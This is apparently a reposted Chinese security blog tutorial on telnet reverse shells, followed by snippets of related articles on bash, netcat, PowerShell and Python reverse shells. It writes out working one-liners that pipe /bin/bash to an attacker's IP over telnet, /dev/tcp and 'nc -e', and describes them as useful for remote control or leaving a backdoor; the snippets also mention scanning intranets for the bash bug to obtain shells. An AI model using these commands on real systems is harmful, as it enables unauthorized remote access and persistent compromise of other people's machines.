[Shell]Telnet反弹shell

原作者:包子love
文章出处:黑白之道

今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。

前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。

这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。

0x01 第一种

1.攻击机先执行监听:nc -l 2222

2.目标机执行:mknod a p; telnet x.x.x.x 2222 0<a | /bin/bash 1>a (x.x.x.x为攻击机ip)

3.攻击机已经获得shell(没有提示),尝试执行命令:

0x02 第二种

1.攻击机需要开两个终端分别监听两个端口:nc -l 6666,nc -l 5555

2.目标机执行:telnet x.x.x.x 6666 | /bin/bash | telnet x.x.x.x 5555 (x.x.x.x为攻击机ip)

3.目标机已经获得shell,尝试执行命令(第一个终端执行命令会在第二个终端回显):

这就是利用telnet反弹shell的两种方式,当然也不仅有这两种,网上可以找到其他各种反弹的方式,不过原理都差不多。

本次演示使用的两个系统都是centos7,且近乎初始化的系统,演示是截图这种效果。根据操作系统不同,有的系统获取到shell或者被目标机telnet连接时是会有回显的。

0x03 参考链接

利用telnet反弹shell的两种方法

原文地址:https://www.cnblogs.com/-mo-/p/11528930.html

时间: 2024-10-01 23:23:04

[Shell]Telnet反弹shell的相关文章

[Shell]Powershell反弹shell

原作者:Cream 文章出处: 贝塔安全实验室 0x01 Powershell反弹shell Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能.它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本. 一旦攻击者可以在一台计算机上运行代码,他们便可以下载powershell脚本文件(.ps1)到磁盘执行,脚本

反弹shell利用方式

反弹shell 1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n:  不反向解析dns,即不通过ip解析域名 no dns -v:  详细信息输出 verbose -l:   监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i >& /dev/tcp/攻击机ip/攻击机port 0>&1 bash -i:交互式shell >& :输入输出重定向:0 stdin, 1 stdout, 2 stde

反弹shell方法总结

本机ip为10.10.10.11,监听端口443. Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i >& /dev/tcp/10.10.10.11/443 0>&1 /bin/bash -i > /dev/tcp/10.10.10.11/443 0<& 2>&1 exec 5<>/dev/tcp/10.10.10.11/443;cat &

Python 反弹shell后门用51CTO Blog绑定

前言:仅做交流,仅做交流. 除了51CTO当然也可以用其他的媒介啦,比如微博,微信等.这里就用51CTO吧 思路:存在这样的一个情况,我们在某台机器上放置一个木马~~~里面我们会写入自己服务端的IP,但是可能我们的IP会变,我们当然可以用域名解决这个问题,不过那样显得不是很优雅,而且域名要钱的啦~~~所以我们需要一个中间件! 在说说什么是反弹Shell,反弹shell的好处在于被攻击的主机可能限制了进口,即只允许某个端口的链接,其他链接都屏蔽,这个时候我们就需要被攻击的主机主动来连我们的服务器,

Linux 反弹 Shell

攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接地或容易地驱动. 同时,nc又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能.渗透测试中,linux主机一般自带nc,Windows主机需要自行上传. 姿势一

JS探测内网是否存在bash漏洞,反弹shell

来t00ls几天啦,也没时间写原创. --(本人首发土司啦.) 最近看到老外一篇文章,觉得很不错. 测试了一下把这个东西把过程分享给大伙,希望大伙不要踩,忙完这几天就写原创 调用一个js,扫描内网是否存在bash漏洞,然后反弹shell回来的一个小东西.搞APT应该用得到啦. 测试过程: 老外发的一个Poc我内网搭建测试 先监听了本地250端口 然后搭建之后访问 1 http://192.168.1.9/test.html?s=192.168.1.1&e3=1&e4=20&d=19

NC / Netcat - 反弹Shell

原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口 [email protected]:~# nc 192.168.12.109 2222 -e /bin/bash 反弹shell成功后即可在windows的cmd.exe下执行Linux下的/

shell telnet 路由器

#!/usr/bin/expect -f spawn telnet 172.16.1.80 expect "login" { send "admin\n" expect { "Password" { send "admin\n" } } } expect ">" {send "show interface all status\n"} expect ">"

Python3实现——反弹shell

一.演示一下反弹shell的效果 0.看一下python版本 1.我们这边是服务端 客户端连接后就可以输入命令了,比如下面截图中输入的pwd 2.目标机是客户端,输入ip和端口 二.代码+注释 0.服务端 1.客户端